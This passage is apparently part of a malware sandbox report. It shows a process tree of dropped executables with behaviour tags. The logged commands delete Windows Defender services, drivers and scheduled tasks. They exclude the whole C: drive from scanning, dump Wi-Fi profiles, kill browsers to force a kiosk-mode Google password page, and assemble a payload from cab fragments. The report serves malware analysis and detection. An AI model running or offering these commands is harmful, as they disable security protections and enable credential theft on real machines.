        Launches sc.exe
        
        PID:1292
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:4452
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3400
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2744
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3952
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5328
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:2364
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:448
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1356
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:364
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2260
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4080
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:6028
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4928
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2272
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:5924
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5652
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:2200
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1180
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3580
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5948
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:1312
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:4672
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:4908
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:3332
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:4708
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4820
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:4892
      - C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"
        6⤵
        Executes dropped EXE
        
        PID:5352
      - C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3736
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3748
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2468
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5088
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5004
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 2448
        7⤵
        Program crash
        
        PID:580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5992
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2976
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5420
      - C:\Users\Admin\AppData\Local\Temp\10419550101\2c8d23ef22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419550101\2c8d23ef22.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:448
      - C:\Users\Admin\AppData\Local\Temp\10419560101\ddb314f467.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419560101\ddb314f467.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3204
      - C:\Users\Admin\AppData\Local\Temp\10419570101\cab1283345.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419570101\cab1283345.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5300
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2456
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6096
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1408
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:5004
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5240
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2016 -prefsLen 27099 -prefMapHandle 2020 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {c8b54d7c-83b0-494f-b1a7-005e9fee9707} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:1268
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {a50275c8-53c0-476d-8346-e87dec17c015} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:624
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3944 -prefsLen 25164 -prefMapHandle 3948 -prefMapSize 270279 -jsInitHandle 3952 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3960 -initialChannelId {2c0e4c85-7ed6-46cb-b79c-5140d5d32844} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:1020
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4112 -prefsLen 27276 -prefMapHandle 4116 -prefMapSize 270279 -ipcHandle 4184 -initialChannelId {878e219c-baa7-4966-8d63-5600959df065} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:5348
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2968 -prefsLen 34775 -prefMapHandle 3000 -prefMapSize 270279 -jsInitHandle 3004 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2776 -initialChannelId {b51a831f-9ea9-4c42-9af8-f3ee47dea6d7} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:4604
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5040 -prefsLen 35012 -prefMapHandle 5168 -prefMapSize 270279 -ipcHandle 5144 -initialChannelId {618e9847-9f05-44fb-99fb-c4810b3c4425} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:4708
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5368 -prefsLen 32952 -prefMapHandle 5372 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5352 -initialChannelId {da6a7cf7-d0fc-4a40-a012-4b5cb070e6d3} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:4312
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5416 -prefsLen 32952 -prefMapHandle 5400 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5592 -initialChannelId {fded2c29-1089-437a-a062-fe9f19d35349} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:3220
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2768 -prefsLen 32952 -prefMapHandle 2984 -prefMapSize 270279 -jsInitHandle 1668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5756 -initialChannelId {bb4801c8-764f-41cc-90d8-c4ee55c7728c} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\10419580101\53e64105fd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419580101\53e64105fd.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4704
      - C:\Users\Admin\AppData\Local\Temp\10419590101\f5cd7caa1f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419590101\f5cd7caa1f.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4672
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4060
      - C:\Users\Admin\AppData\Local\Temp\10419600101\176117a9a6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419600101\176117a9a6.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2220
      - C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5996
      - C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:3228
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:4376
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\{260b7e13-606a-4960-8c7a-09e61300b00e}\5969479a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{260b7e13-606a-4960-8c7a-09e61300b00e}\5969479a.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\{68a40378-7cb7-467d-886f-bda91b067132}\5a11d930.exe
        
        C:/Users/Admin/AppData/Local/Temp/{68a40378-7cb7-467d-886f-bda91b067132}/\5a11d930.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:7864
      - C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1620
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\10419650101\ac5082e7c9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419650101\ac5082e7c9.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2356
      - C:\Users\Admin\AppData\Local\Temp\10419670101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419670101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:6488
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6724
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:10000
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:9988
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:10320
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10324
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10484
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10520
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10728
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10888
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:10944
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11092
      - C:\Users\Admin\AppData\Local\Temp\10419680101\h8NlU62.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419680101\h8NlU62.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:8808
      - C:\Users\Admin\AppData\Local\Temp\10419690101\279ebdcc44.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419690101\279ebdcc44.exe"
        6⤵
        
        PID:12680
      - C:\Users\Admin\AppData\Local\Temp\10419700101\3sZiUQa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419700101\3sZiUQa.exe"
        6⤵
        
        PID:3328
      - C:\Users\Admin\AppData\Local\Temp\10419710101\KXtPusH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419710101\KXtPusH.exe"
        6⤵
        
        PID:7392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4420
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        8⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1252
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        8⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 2296
        7⤵
        Program crash
        
        PID:8360
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        7⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        8⤵
        
        PID:4484
      - C:\Users\Admin\AppData\Local\Temp\10419720101\f565c82372.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419720101\f565c82372.exe"
        6⤵
        
        PID:8048
      - C:\Users\Admin\AppData\Local\Temp\10419730101\e6911e6e00.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10419730101\e6911e6e00.exe"
        6⤵
        
        PID:3484

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x498 0x2f4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3736 -ip 3736
1⤵
PID:1208

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{1ecfb85f-c304-4da8-be54-74c3b8a8fa08}\17c00725-0351-4b58-b404-eed076931aba.cmd"
1⤵
PID:7912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8144
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8624
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9652
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10028
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10064
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10388
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10436
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10780
- C:\Windows\system32\PING.EXE
